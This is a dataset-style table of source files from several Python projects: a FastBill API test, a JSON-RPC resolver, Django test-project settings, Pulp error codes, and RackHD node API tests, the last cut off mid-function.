repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
stylight/python-fastbill | tests/test_api.py | 1 | 6430 | #!/usr/bin/env python
# encoding: utf-8
import datetime
import decimal
import httpretty
import json
import unittest
# Set the endpoint to http because some library combinations
# lead to an SSLError when running the test with httpretty.
api_endpoint = "http://automatic.fastbill.com/api/1.0/api.php"
api_email = "[email protected]"
api_key = "4"
RESPONSE_DATA = {
'SUBSCRIPTIONS': [
{
'SUBSCRIPTION': {
'SUBSCRIPTION_ID': '1101',
'CUSTOMER_ID': '296526',
'START': '2013-05-24 13:50:33',
'NEXT_EVENT': '2013-06-24 13:50:33',
'CANCELLATION_DATE': '2013-06-24 13:50:33',
'STATUS': 'canceled',
'ARTICLE_NUMBER': '1',
'SUBSCRIPTION_EXT_UID': '',
'LAST_EVENT': '2013-05-24 13:50:33',
}
}
]
}
class JsonTest(unittest.TestCase):
def test_json_encoder(self):
import fastbill
json_dump = json.dumps({
'date': datetime.date(2016, 6, 2),
'datetime': datetime.datetime(2015, 5, 1, 14, 42, 17),
'money': decimal.Decimal("17.23"),
}, cls=fastbill.jsonencoder.CustomJsonEncoder)
self.assertEqual(
json.loads(json_dump),
{'date': '2016-06-02',
'money': '17.23',
'datetime': '2015-05-01 14:42:17'}
)
class TestWrapper(unittest.TestCase):
TESTCASES = {
'customer.get': [
({'country_code': 'at'}, 200, {'CUSTOMERS': []}),
({'country_code': 'de'}, 200, {'CUSTOMERS': [{'NAME': 'Hans'}]}),
],
'getnewargs': [
({}, 400, {u'ERRORS': [u'unknown SERVICE: getnewargs',
u'unknown SERVICE: ']}),
],
'subscription.get': [
({}, 200, {}),
],
'subscription.setusagedata': [
(
{
'USAGE_DATE': datetime.datetime(2015, 5, 1),
'UNIT_PRICE': decimal.Decimal('17.23'),
'CURRENCY_CODE': u'EUR',
},
200,
{}
),
],
}
def test_response(self):
import fastbill
response = RESPONSE_DATA
class FakeAPI(object):
def subscription_get(self, filter=None):
return fastbill.response.FastbillResponse(response, self)
resp = fastbill.response.FastbillResponse(response, FakeAPI())
self.assertEqual(response,
resp.subscriptions[0].subscription.subscription)
self.assertRaises(AttributeError, getattr, resp, 'blah')
resp_iter = iter(resp)
self.assertEqual(next(resp_iter),
response['SUBSCRIPTIONS'][0])
self.assertRaises(StopIteration, next, resp_iter)
@httpretty.activate
def test_wrapper(self):
import fastbill
from mock import Mock
mock = Mock()
class ResponseLookAlike(object):
def __init__(self, status_code):
self.status_code = status_code
def __eq__(self, other):
return self.status_code == other.status_code
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
pre_request=mock.pre_request,
post_request=mock.post_request)
for method_name, calls in self.TESTCASES.items():
attribute_name = method_name.replace(".", "_")
try:
method = getattr(api, attribute_name)
except AttributeError:
if not attribute_name.startswith("_"):
raise
for (filter_by, http_code, response) in calls:
def request_callback(method, _, headers,
method_name=method_name,
http_code=http_code,
response=response):
request = json.loads(method.body.decode('utf8'))
request['SERVICE'] = method_name
return (http_code, headers, json.dumps({
'RESPONSE': response,
'REQUEST': request,
}, cls=fastbill.jsonencoder.CustomJsonEncoder))
httpretty.register_uri(httpretty.POST,
api.SERVICE_URL,
body=request_callback)
params = {'filter': filter_by}
if http_code == 200:
result = method(**params)
self.assertEqual(result, response)
else:
self.assertRaises(fastbill.exceptions.FastbillResponseError,
method, **params)
# The actual payload will look like this.
payload = params.copy()
payload.update({
'service': method_name,
'limit': None,
'offset': None,
'data': None
})
mock.pre_request.assert_called_with(
method_name,
payload
)
mock.post_request.assert_called_with(
method_name,
payload,
ResponseLookAlike(http_code)
)
def test_pickle(self):
import pickle
import fastbill
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
name="blah")
response = fastbill.response.FastbillResponse(RESPONSE_DATA, api)
pickled_response = pickle.dumps(response)
unpickled_response = pickle.loads(pickled_response)
self.assertTrue(unpickled_response.api is None)
self.assertEqual(
unpickled_response.subscriptions[0].subscription.article_number,
'1')
self.assertRaises(
KeyError,
lambda: unpickled_response.subscriptions[0].subscription.customer)
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-vv', '--with-doctest'])
| mit | 5,063,697,128,748,161,000 | 32.489583 | 80 | 0.487092 | false | 4.566761 | true | false | false |
steffgrez/fast-jsonrpc2 | fast_jsonrpc2/resolver.py | 1 | 2183 | """
from fast_jsonrpc import JSONRPCResolver
def foo(msg):
return 'foobar ' + str(msg)
router = {'foo': foo}
resolver = JSONRPCResolver(router)
json_request = {"jsonrpc": "2.0", "method": "foo", "params": ["toto"], "id": 1}
json_response = resolver.handle(json_request)
print json_response
-> {"jsonrpc": "2.0", "result": "foobar toto", "id": 1}
"""
import json
from fast_jsonrpc2.request import RequestHandler
from fast_jsonrpc2.response import ResponseHandler
class JSONRPCResolver(object):
__slots__ = [
'serializer',
'response_handler',
'request_handler'
]
def __init__(
self,
router,
lazy_check=False,
error_verbose=True,
serializer=json
):
self.serializer = serializer
self.response_handler = ResponseHandler(error_verbose)
self.request_handler = RequestHandler(
self.response_handler, router, lazy_check
)
def handle(self, str_request):
response = None
try:
# handle encoding
if isinstance(str_request, bytes):
str_request = str_request.decode("utf-8")
# get response from unserialized request
try:
request = self.serializer.loads(str_request)
except (TypeError, ValueError):
response = self.response_handler.get_parse_error_response(
data='Bad formatted json'
)
else:
if not request:
response = self.response_handler \
.get_invalid_request_response(
data='Empty request is not allowed'
)
else:
response = self.request_handler.get_response(request)
except Exception as e:
# handle unexpected exception
response = self.response_handler.get_internal_error_response(
data=e.args[0]
)
# return serialized result
return self.serializer.dumps(response) if response else ''
class JSONRPCException(Exception):
pass
| mit | 4,663,643,689,105,370,000 | 26.2875 | 79 | 0.558406 | false | 4.501031 | false | false | false |
ninemoreminutes/django-datatables | test_project/settings.py | 1 | 2955 | # Python
import os
import sys
# Django
from django.conf import global_settings
# Update this module's local settings from the global settings module.
this_module = sys.modules[__name__]
for setting in dir(global_settings):
if setting == setting.upper():
setattr(this_module, setting, getattr(global_settings, setting))
# Absolute path to the directory containing this Django project.
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'test_project.sqlite3'),
}
}
SITE_ID = 1
STATIC_URL = '/static/'
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'devserver.middleware.DevServerMiddleware',
)
TEMPLATE_DIRS = (
#os.path.join(PROJECT_ROOT, 'templates'),
)
ROOT_URLCONF = 'test_project.urls'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
#'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'debug_toolbar',
'devserver',
'django_extensions',
'south',
'sortedm2m',
'fortunecookie',
'datatables',
'test_app',
)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
#'INTERCEPT_REDIRECTS': False,
}
DEVSERVER_DEFAULT_ADDR = '127.0.0.1'
DEVSERVER_DEFAULT_PORT = '8044'
DEVSERVER_MODULES = (
# SQLRealTimeModule is broken with Django 1.6.
#'devserver.modules.sql.SQLRealTimeModule',
'devserver.modules.sql.SQLSummaryModule',
'devserver.modules.profile.ProfileSummaryModule',
# Modules not enabled by default
#'devserver.modules.ajax.AjaxDumpModule',
#'devserver.modules.profile.MemoryUseModule',
#'devserver.modules.cache.CacheSummaryModule',
#'devserver.modules.profile.LineProfilerModule',
)
SECRET_KEY = 'gkwl+r%+^4==^(dnnkv8o#&h&bn=x43*k$h7_e7p+l0w&eba)m'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
}
},
'handlers': {
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
},
'null': {
'class': 'django.utils.log.NullHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console'],
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'py.warnings': {
'handlers': ['console'],
},
'datatables': {
'handlers': ['console'],
}
}
}
| bsd-3-clause | 7,971,362,363,779,574,000 | 23.221311 | 72 | 0.598308 | false | 3.488784 | false | false | false |
ulif/pulp | common/pulp/common/error_codes.py | 1 | 9417 | from collections import namedtuple
from gettext import gettext as _
Error = namedtuple('Error', ['code', 'message', 'required_fields'])
"""
The error named tuple has 3 components:
code: The 7 character uniquely identifying code for this error, 3 A-Z identifying the module
followed by 4 numeric characters for the msg id. All general pulp server errors start
with PLP
message: The message that will be printed for this error
required_fields: A list of required fields for printing the message
"""
# The PLP0000 error is to wrap non-pulp exceptions
PLP0000 = Error("PLP0000",
"%(message)s", ['message'])
PLP0001 = Error("PLP0001",
_("A general pulp exception occurred"), [])
PLP0002 = Error(
"PLP0002",
_("Errors occurred updating bindings on consumers for repo %(repo_id)s and distributor "
"%(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0003 = Error("PLP0003",
_("Errors occurred removing bindings on consumers while deleting a distributor for "
"repo %(repo_id)s and distributor %(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0004 = Error("PLP0004",
_("Errors occurred creating bindings for the repository group %(group_id)s. "
"Binding creation was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0005 = Error("PLP0005",
_("Errors occurred deleting bindings for the repository group %(group_id)s. "
"Binding deletion was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0006 = Error("PLP0006", _("Errors occurred while updating the distributor configuration for "
"repository %(repo_id)s"),
['repo_id'])
PLP0007 = Error("PLP0007",
_("Error occurred while cascading delete of repository %(repo_id)s to distributor "
"bindings associated with it."),
['repo_id'])
PLP0008 = Error("PLP0008",
_("Error raising error %(code)s. "
"The field [%(field)s] was not included in the error_data."),
['code', 'field'])
PLP0009 = Error("PLP0009", _("Missing resource(s): %(resources)s"), ['resources'])
PLP0010 = Error("PLP0010", _("Conflicting operation reasons: %(reasons)s"), ['reasons'])
PLP0011 = Error("PLP0011", _("Operation timed out after: %(timeout)s"), ['timeout'])
PLP0012 = Error("PLP0012", _("Operation postponed"), [])
PLP0014 = Error("PLP0014", _('Operation not implemented: %(operation_name)s'), ['operation_name'])
PLP0015 = Error("PLP0015", _('Invalid properties: %(properties)s'), ['properties'])
PLP0016 = Error("PLP0016", _('Missing values for: %(properties)s'), ['properties'])
PLP0017 = Error("PLP0017", _('Unsupported properties: %(properties)s'), ['properties'])
PLP0018 = Error("PLP0018", _('Duplicate resource: %(resource_id)s'), ['resource_id'])
PLP0019 = Error("PLP0019", _('Pulp only accepts input encoded in UTF-8: %(value)s'), ['value'])
PLP0020 = Error("PLP0020",
_("Errors occurred installing content for the consumer group %(group_id)s."),
['group_id'])
PLP0021 = Error("PLP0021",
_("Errors occurred updating content for the consumer group %(group_id)s."),
['group_id'])
PLP0022 = Error("PLP0022",
_("Errors occurred uninstalling content for the consumer group %(group_id)s."),
['group_id'])
PLP0023 = Error("PLP0023", _("Task is already in a complete state: %(task_id)s"), ['task_id'])
PLP0024 = Error("PLP0024",
_("There are no Celery workers found in the system for reserved task work. "
"Please ensure that there is at least one Celery worker running, and that the "
"celerybeat service is also running."),
[])
PLP0025 = Error("PLP0025", _("Authentication failed."), [])
PLP0026 = Error(
"PLP0026", _("Permission denied: user %(user)s cannot perform %(operation)s."),
['user', 'operation'])
PLP0027 = Error(
"PLP0027", _("Authentication with username %(user)s failed: invalid SSL certificate."),
['user'])
PLP0028 = Error(
"PLP0028", _("Authentication with username %(user)s failed: invalid oauth credentials."),
['user'])
PLP0029 = Error(
"PLP0029",
_("Authentication with username %(user)s failed: preauthenticated remote user is missing."),
['user'])
PLP0030 = Error(
"PLP0030",
_("Authentication with username %(user)s failed: invalid username or password"), ['user'])
PLP0031 = Error("PLP0031", _("Content source %(id)s could not be found at %(url)s"), ['id', 'url'])
PLP0032 = Error(
"PLP0032", _("Task %(task_id)s encountered one or more failures during execution."),
['task_id'])
PLP0034 = Error("PLP0034", _("The distributor %(distributor_id)s indicated a failed response when "
"publishing repository %(repo_id)s."),
['distributor_id', 'repo_id'])
PLP0037 = Error(
"PLP0037",
_("Content import of %(path)s failed - must be an existing file."),
['path'])
PLP0038 = Error("PLP0038", _("The unit model with id %(model_id)s and class "
"%(model_class)s failed to register. Another model has already "
"been registered with the same id."), ['model_id', 'model_class'])
PLP0040 = Error("PLP0040", _("Database 'seeds' config must include at least one hostname:port "
"value. Refer to /etc/pulp/server.conf for proper use."), [])
PLP0041 = Error("PLP0041", _("Database 'replica_set' config must be specified when more than one "
"seed is provided. Refer to /etc/pulp/server.conf for proper use."),
[])
PLP0042 = Error("PLP0042", _("This request is forbidden."), [])
PLP0043 = Error("PLP0043", _("Database 'write_concern' config can only be 'majority' or 'all'. "
"Refer to /etc/pulp/server.conf for proper use."), [])
PLP0044 = Error("PLP0044", _("The target importer does not support the types from the source"), [])
PLP0045 = Error("PLP0045", _("The repository cannot be exported because some units are "
"not downloaded."), [])
PLP0046 = Error("PLP0046", _("The repository group cannot be exported because these repos have "
"units that are not downloaded: %(repos)s"), ['repos'])
PLP0047 = Error("PLP0047", _("The importer %(importer_id)s indicated a failed response when "
"uploading %(unit_type)s unit to repository %(repo_id)s."),
['importer_id', 'unit_type', 'repo_id'])
PLP0048 = Error("PLP0048", _("The file is expected to be present, but is not, for unit %(unit)s"),
['unit'])
PLP0049 = Error(
"PLP0049",
_('Worker terminated abnormally while processing task %(task_id)s. '
'Check the logs for details'),
['task_id'])
# Create a section for general validation errors (PLP1000 - PLP2999)
# Validation problems should be reported with a general PLP1000 error with a more specific
# error message nested inside of it.
PLP1000 = Error("PLP1000", _("A validation error occurred."), [])
PLP1001 = Error("PLP1001", _("The consumer %(consumer_id)s does not exist."), ['consumer_id'])
PLP1002 = Error("PLP1002", _("The field %(field)s must have a value specified."), ['field'])
PLP1003 = Error(
"PLP1003",
_("The value specified for the field %(field)s must be made up of letters, numbers, "
"underscores, or hyphens with no spaces."),
['field'])
PLP1004 = Error(
"PLP1004",
_("An object of type %(type)s already exists in the database with an id of %(object_id)s"),
['type', 'object_id'])
PLP1005 = Error("PLP1005", _("The checksum type '%(checksum_type)s' is unknown."),
['checksum_type'])
PLP1006 = Error(
"PLP1006", _("The value specified for the field %(field)s may not start with %(value)s."),
['field', 'value'])
PLP1007 = Error("PLP1007", _("The relative path specified must not point outside of the parent"
" directory: %(path)s"), ['path'])
PLP1008 = Error("PLP1008", _("The importer type %(importer_type_id)s does not exist"),
['importer_type_id'])
PLP1009 = Error("PLP1009", _("The request body does not contain valid JSON"), [])
PLP1010 = Error("PLP1010", _("Provided value %(value)s for field %(field)s must be of type "
"%(field_type)s."), ["value", "field", "field_type"])
PLP1011 = Error("PLP1011", _("Invalid task state passed to purge: %(state)s."), ["state"])
PLP1012 = Error("PLP1012", _("No task state given to parameters list for delete."), [])
PLP1013 = Error("PLP1013", _("Checksum does not match calculated value."), [])
PLP1014 = Error("PLP1014", _("The configuration value for the key '%(key)s' in "
"section '%(section)s' is not valid for the following "
"reason: %(reason)s"), ["key", "section", "reason"])
PLP1015 = Error("PLP1015", _("The JSON data must be of type '%(data_type)s'."),
['data_type'])
| gpl-2.0 | 3,952,500,558,581,350,000 | 56.072727 | 100 | 0.609642 | false | 3.846814 | false | false | false |
stuart-stanley/RackHD | test/tests/api/v2_0/nodes_tests.py | 1 | 20157 | from config.api2_0_config import config
from config.amqp import *
from modules.logger import Log
from modules.amqp import AMQPWorker
from modules.worker import WorkerThread, WorkerTasks
from on_http_api2_0 import ApiApi as Api
from on_http_api2_0 import rest
from datetime import datetime
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_false
from proboscis.asserts import assert_raises
from proboscis.asserts import assert_not_equal
from proboscis.asserts import assert_is_not_none
from proboscis.asserts import assert_true
from proboscis.asserts import fail
from proboscis import SkipTest
from proboscis import test
from json import loads
from time import sleep
LOG = Log(__name__)
@test(groups=['nodes_api2.tests'])
class NodesTests(object):
def __init__(self):
self.__client = config.api_client
self.__worker = None
self.__discovery_duration = None
self.__discovered = 0
self.__test_nodes = [
{
'identifiers': ["FF:FF:FF:01"],
'autoDiscover': False,
'name': 'test_switch_node',
'type': 'switch'
},
{
'identifiers': ["FF:FF:FF:02"],
'autoDiscover': False,
'name': 'test_mgmt_node',
'type': 'mgmt'
},
{
'identifiers': ["FF:FF:FF:03"],
'autoDiscover': False,
'name': 'test_pdu_node',
'type': 'pdu'
},
{
'identifiers': ["FF:FF:FF:04"],
'autoDiscover': False,
'name': 'test_enclosure_node',
'type': 'enclosure'
},
{
'identifiers': ["FF:FF:FF:05"],
'autoDiscover': False,
'name': 'test_compute_node',
'type': 'compute'
}
]
self.__test_tags = {
'tags': ['tag1', 'tag2']
}
self.__test_obm = {
'config': {
'host': '1.2.3.4',
'user': 'username',
'password': 'password'
},
'service': 'noop-obm-service'
}
def __get_data(self):
return loads(self.__client.last_response.data)
def __get_workflow_status(self, id, query ):
Api().nodes_get_workflow_by_id(identifier=id, active=query )
data = self.__get_data()
if len(data) > 0:
status = data[0].get('_status')
return status
return 'not running'
def __post_workflow(self, id, graph_name):
status = self.__get_workflow_status(id, 'true')
if status != 'pending' and status != 'running':
Api().nodes_post_workflow_by_id(identifier=id, name=graph_name, body={'name': graph_name})
timeout = 20
while status != 'pending' and status != 'running' and timeout != 0:
LOG.warning('Workflow status for Node {0} (status={1},timeout={2})'.format(id,status,timeout))
status = self.__get_workflow_status(id, 'true')
sleep(1)
timeout -= 1
return timeout
def check_compute_count(self):
Api().nodes_get_all()
nodes = self.__get_data()
count = 0
for n in nodes:
type = n.get('type')
if type == 'compute':
count += 1
return count
@test(groups=['nodes.api2.discovery.test'])
def test_nodes_discovery(self):
""" API 2.0 Testing Graph.Discovery completion """
count = defaults.get('RACKHD_NODE_COUNT', '')
if (count.isdigit() and self.check_compute_count() == int(count)) or self.check_compute_count():
LOG.warning('Nodes already discovered!')
return
self.__discovery_duration = datetime.now()
LOG.info('Wait start time: {0}'.format(self.__discovery_duration))
self.__task = WorkerThread(AMQPWorker(queue=QUEUE_GRAPH_FINISH, \
callbacks=[self.handle_graph_finish]), 'discovery')
def start(worker,id):
worker.start()
tasks = WorkerTasks(tasks=[self.__task], func=start)
tasks.run()
tasks.wait_for_completion(timeout_sec=1200)
assert_false(self.__task.timeout, \
message='timeout waiting for task {0}'.format(self.__task.id))
def handle_graph_finish(self,body,message):
routeId = message.delivery_info.get('routing_key').split('graph.finished.')[1]
Api().workflows_get()
workflows = self.__get_data()
for w in workflows:
injectableName = w.get('injectableName')
if injectableName == 'Graph.SKU.Discovery':
graphId = w.get('context',{}).get('graphId', {})
if graphId == routeId:
message.ack()
status = body.get('status')
if status == 'succeeded' or status == 'failed':
duration = datetime.now() - self.__discovery_duration
msg = {
'graph_name': injectableName,
'status': status,
'route_id': routeId,
'duration': str(duration)
}
if status == 'failed':
msg['active_task'] = w.get('tasks',{})
LOG.error(msg, json=True)
else:
LOG.info(msg, json=True)
self.__discovered += 1
break
check = self.check_compute_count()
if check and check == self.__discovered:
self.__task.worker.stop()
self.__task.running = False
self.__discovered = 0
@test(groups=['test-nodes-api2'], depends_on_groups=['nodes.api2.discovery.test'])
def test_nodes(self):
""" Testing GET:/api/2.0/nodes """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
assert_not_equal(0, len(nodes), message='Node list was empty!')
@test(groups=['test-node-id-api2'], depends_on_groups=['test-nodes-api2'])
def test_node_id(self):
""" Testing GET:/api/2.0/nodes/:id """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
codes = []
for n in nodes:
LOG.info(n,json=True)
if n.get('type') == 'compute':
uuid = n.get('id')
Api().nodes_get_by_id(identifier=uuid)
rsp = self.__client.last_response
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_get_by_id, 'fooey')
@test(groups=['create-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_create(self):
""" Testing POST:/api/2.0/nodes/ """
for n in self.__test_nodes:
LOG.info('Creating node (name={0})'.format(n.get('name')))
Api().nodes_post(identifiers=n)
rsp = self.__client.last_response
assert_equal(201, rsp.status, message=rsp.reason)
@test(groups=['patch-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id """
data = {"name": 'fake_name_test'}
Api().nodes_get_all()
nodes = self.__get_data()
codes = []
for n in nodes:
if n.get('name') == 'test_compute_node':
uuid = n.get('id')
Api().nodes_patch_by_id(identifier=uuid,body=data)
rsp = self.__client.last_response
test_nodes = self.__get_data()
assert_equal(test_nodes.get('name'), 'fake_name_test', 'Oops patch failed')
codes.append(rsp)
LOG.info('Restoring name to "test_compute_node"')
correct_data = {"name": 'test_compute_node'}
Api().nodes_patch_by_id(identifier=uuid,body=correct_data)
rsp = self.__client.last_response
restored_nodes = self.__get_data()
assert_equal(restored_nodes.get('name'), 'test_compute_node', 'Oops restoring failed')
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_by_id, 'fooey', data)
@test(groups=['delete-node-api2'], depends_on_groups=['patch-node-api2'])
def test_node_delete(self):
""" Testing DELETE:/api/2.0/nodes/:id """
codes = []
test_names = []
Api().nodes_get_all()
nodes = self.__get_data()
test_names = [t.get('name') for t in self.__test_nodes]
for n in nodes:
name = n.get('name')
if name in test_names:
uuid = n.get('id')
LOG.info('Deleting node {0} (name={1})'.format(uuid, name))
Api().nodes_del_by_id(identifier=uuid)
codes.append(self.__client.last_response)
assert_not_equal(0, len(codes), message='Delete node list empty!')
for c in codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_by_id, 'fooey')
@test(groups=['catalog_nodes-api2'], depends_on_groups=['delete-node-api2'])
def test_node_catalogs(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
for resp in resps:
assert_not_equal(0, len(resp), message='Node catalog is empty!')
assert_raises(rest.ApiException, Api().nodes_get_catalog_by_id, 'fooey')
@test(groups=['catalog_source-api2'], depends_on_groups=['catalog_nodes-api2'])
def test_node_catalogs_bysource(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs/source """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_source_by_id(identifier=n.get('id'), source='bmc')
resps.append(self.__client.last_response)
for resp in resps:
assert_equal(200,resp.status, message=resp.reason)
assert_raises(rest.ApiException, Api().nodes_get_catalog_source_by_id, 'fooey','bmc')
@test(groups=['node_workflows-api2'], depends_on_groups=['catalog_source-api2'])
def test_node_workflows_get(self):
""" Testing GET:/api/2.0/nodes/:id/workflows """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_workflow_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
# Api().nodes_get_workflow_by_id('fooey')
# try:
# Api().nodes_get_workflow_by_id('fooey')
# fail(message='did not raise exception for nodes_get_workflow_by_id with bad id')
# except rest.ApiException as e:
# assert_equal(404, e.status,
# message='unexpected response {0}, expected 404 for bad nodeId'.format(e.status))
# @test(groups=['node_post_workflows-api2'], depends_on_groups=['node_workflows-api2'])
# def test_node_workflows_post(self):
# """ Testing POST:/api/2.0/nodes/:id/workflows """
# resps = []
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = self.__post_workflow(id,'Graph.Discovery')
# if timeout > 0:
# data = self.__get_data()
# resps.append({'data': data, 'id':id})
# for resp in resps:
# assert_not_equal(0, len(resp['data']),
# message='No Workflows found for Node {0}'.format(resp['id']))
# assert_raises(rest.ApiException, Api().nodes_post_workflow_by_id, 'fooey',name='Graph.Discovery',body={})
# @test(groups=['node_workflows_del_active-api2'], depends_on_groups=['node_post_workflows-api2'])
# def test_workflows_action(self):
# """ Testing PUT:/api/2.0/nodes/:id/workflows/action """
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = 5
# done = False
# while timeout > 0 and done == False:
# if 0 == self.__post_workflow(id,'Graph.Discovery'):
# fail('Timed out waiting for graph to start!')
# try:
# Api().nodes_workflow_action_by_id(id, {'command': 'cancel'})
# done = True
# except rest.ApiException as e:
# if e.status != 404:
# raise e
# timeout -= 1
# assert_not_equal(timeout, 0, message='Failed to delete an active workflow')
# assert_raises(rest.ApiException, Api().nodes_workflow_action_by_id, 'fooey', {'command': 'test'})
@test(groups=['node_tags_patch'], depends_on_groups=['node_workflows-api2'])
def test_node_tags_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_patch_tag_by_id(identifier=n.get('id'), body=self.__test_tags)
LOG.info('Creating tag (name={0})'.format(self.__test_tags))
rsp = self.__client.last_response
codes.append(rsp)
            LOG.info(n.get('id'))
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_get'], depends_on_groups=['node_tags_patch'])
def test_node_tags_get(self):
""" Testing GET:api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
Api().nodes_get_tags_by_id(n.get('id'))
rsp = self.__client.last_response
tags = loads(rsp.data)
codes.append(rsp)
for t in self.__test_tags.get('tags'):
assert_true(t in tags, message= "cannot find new tag" )
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_delete'], depends_on_groups=['node_tags_get'])
def test_node_tags_del(self):
""" Testing DELETE:api/2.0/nodes/:id/tags/:tagName """
get_codes = []
del_codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
get_codes.append(rsp)
for n in nodes:
for t in self.__test_tags.get('tags'):
Api().nodes_del_tag_by_id(identifier=n.get('id'), tag_name=t)
rsp = self.__client.last_response
del_codes.append(rsp)
Api().nodes_get_by_id(identifier=n.get('id'))
rsp = self.__client.last_response
get_codes.append(rsp)
updated_node = loads(rsp.data)
for t in self.__test_tags.get('tags'):
assert_true(t not in updated_node.get('tags'), message= "Tag " + t + " was not deleted" )
for c in get_codes:
assert_equal(200, c.status, message=c.reason)
for c in del_codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_tag_by_id, 'fooey',tag_name=['tag'])
@test(groups=['nodes_tag_masterDelete'], depends_on_groups=['node_tags_delete'])
def test_node_tags_masterDel(self):
""" Testing DELETE:api/2.0/nodes/tags/:tagName """
codes = []
self.test_node_tags_patch()
t = 'tag3'
LOG.info("Check to make sure invalid tag is not deleted")
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
LOG.info("Test to check valid tags are deleted")
for t in self.__test_tags.get('tags'):
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
for c in codes:
assert_equal(204, c.status, message=c.reason)
@test(groups=['node_put_obm_by_node_id'], depends_on_groups=['nodes_tag_masterDelete'])
def test_node_put_obm_by_node_id(self):
"""Testing PUT:/api/2.0/nodes/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_put_obms_by_node_id(identifier=n.get('id'), body=self.__test_obm)
LOG.info('Creating obm {0}'.format(self.__test_obm))
rsp = self.__client.last_response
            LOG.info(n.get('id'))
assert_equal(201, rsp.status, message=rsp.status)
@test(groups=['node_get_obm_by_node_id'], depends_on_groups=['node_put_obm_by_node_id'])
def test_node_get_obm_by_node_id(self):
"""Testing GET:/api/2.0/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_get_obms_by_node_id(identifier=n.get('id'))
LOG.info('getting OBMs for node {0}'.format(n.get('id')))
rsp = self.__client.last_response
assert_equal(200, rsp.status, message=rsp.status)
obms = loads(rsp.data)
assert_not_equal(0, len(obms), message='OBMs list was empty!')
for obm in obms:
id = obm.get('id')
Api().obms_delete_by_id(identifier=id)
rsp = self.__client.last_response
assert_equal(204, rsp.status, message=rsp.status)
@test(groups=['node_put_obm_invalid'], depends_on_groups=['node_get_obm_by_node_id'])
def test_node_put_obm_invalid_node_id(self):
